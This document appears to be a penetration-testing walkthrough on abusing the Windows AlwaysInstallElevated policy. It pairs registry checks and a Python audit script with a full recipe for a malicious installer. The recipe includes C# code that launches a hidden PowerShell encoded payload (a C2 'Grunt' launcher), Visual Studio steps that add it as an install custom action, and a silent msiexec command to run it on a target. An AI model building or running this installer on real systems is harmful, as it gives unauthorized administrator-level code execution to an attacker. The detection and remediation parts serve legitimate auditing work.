This policy allows standard users to install applications that need write access to directories and registry keys they would not normally be permitted to change. It is equivalent to granting full administrative rights, and even though Microsoft strongly discourages its use, it can still be found on real hosts.
The easiest way to determine whether this issue exists on the host is to query the following registry value in both hives:
```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
If the value returned is 1, we can escalate our privileges.
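As an added example (not part of the original write-up), the following Python script turns the two `reg query` checks above into an audit finding. It parses the text that `reg.exe` prints, handles the case where the key or value does not exist at all, and applies the rule that matters for triage: the policy is only effective when the value is 1 in both HKCU and HKLM, so a single hive set to 1 is a finding to note but not an exploitable condition. The `reg query` outputs embedded in the script are constructed samples in the shape reg.exe produces, not captures from a real system.

```python
import re
from typing import Optional

# Constructed sample output, shaped like what `reg query ... /v AlwaysInstallElevated`
# prints. These strings are made up for this example, not captured from a real host.
HKCU_SET = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
HKLM_SET = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
HKLM_DISABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0

"""
# What reg.exe prints when the policy key or value does not exist.
KEY_MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"

# Matches the value line: name, type, then a hex (0x1) or decimal DWORD.
_VALUE_LINE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9A-Fa-f]+|\d+)\s*$",
    re.MULTILINE,
)


def parse_always_install_elevated(reg_output: str) -> Optional[int]:
    """Return the AlwaysInstallElevated DWORD from `reg query` output, or None
    when the key/value is absent or the output is not in the expected shape."""
    match = _VALUE_LINE.search(reg_output)
    if match is None:
        return None
    raw = match.group(1)
    return int(raw, 16) if raw.lower().startswith("0x") else int(raw, 10)


def is_always_install_elevated(hkcu_output: str, hklm_output: str) -> bool:
    """The policy only takes effect when BOTH the per-user (HKCU) and the
    per-machine (HKLM) values are 1. One hive set to 1 on its own is not enough."""
    return (
        parse_always_install_elevated(hkcu_output) == 1
        and parse_always_install_elevated(hklm_output) == 1
    )


def audit(hkcu_output: str, hklm_output: str) -> str:
    """Produce a one-line finding suitable for an audit report."""
    hkcu = parse_always_install_elevated(hkcu_output)
    hklm = parse_always_install_elevated(hklm_output)
    state = (
        f"HKCU={'absent' if hkcu is None else hkcu}, "
        f"HKLM={'absent' if hklm is None else hklm}"
    )
    if is_always_install_elevated(hkcu_output, hklm_output):
        return f"FAIL: AlwaysInstallElevated is effective ({state}); standard users can install MSIs with elevated privileges"
    return f"PASS: AlwaysInstallElevated is not effective ({state})"


if __name__ == "__main__":
    print(audit(HKCU_SET, HKLM_SET))        # FAIL: both hives set to 1
    print(audit(HKCU_SET, HKLM_DISABLED))   # PASS: HKLM is 0
    print(audit(KEY_MISSING, KEY_MISSING))  # PASS: policy key not present
```

On a live host, feed the script the real `reg query` output for each hive. The fix is to set both values to 0 or remove them, which is what disabling the "Always install with elevated privileges" Windows Installer policy does in both the Computer Configuration and User Configuration branches of Group Policy.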
To exploit this, we need to package a payload into an MSI installer that will install and run a PowerShell Grunt Launcher. Create a new .NET Framework Console App and copy in the code below (inserting your PowerShell payload in place of the placeholder).
```csharp
using System.Diagnostics;

namespace ExploitMSI
{
    class Program
    {
        static void Main(string[] args)
        {
            // Launch powershell.exe hidden with the encoded launcher command.
            // Replace <blah> with your base64-encoded PowerShell payload.
            var processStartInfo = new ProcessStartInfo
            {
                FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <blah>"
            };
            var process = new Process
            {
                StartInfo = processStartInfo
            };
            process.Start();
            process.WaitForExit();
            process.Dispose();
        }
    }
}
```
Go into the project properties and change the Output type from a Console Application to a Windows Application. This will prevent the installer from opening a window on the user’s desktop.
Next, right-click on the Solution in the Solution Explorer and Add a New Project. Find and choose the Setup Wizard.
As you click through the wizard, select the following options:
Leave everything else blank/default and finish the wizard.
If the platform is x64, change the TargetPlatform to x64. Then right-click the Installer project and go to 'View > Custom Actions'. Right-click 'Install' and select 'Add Custom Action', navigate into 'Application Folder', select 'Primary Output' and click OK. Highlight the new item and, in the Properties window, change 'InstallerClass' to 'False' and 'Run64Bit' to 'True'.
The final step in the setup is to ensure .NET Framework targeting and dependencies are correct. Double-click 'Microsoft .NET Framework' under the Detected Dependencies folder and change the Version to one appropriate for your target.
Build the Console App project and then the Installer project. This should output an .msi file, which you then need to upload to the target.
Upload to the host and execute via the GUI or from a shell:
```
msiexec /quiet /qn /i met.msi
```
To remove the package again afterwards (/x uninstalls):
```
msiexec /x C:\Temp\met.msi /qn
```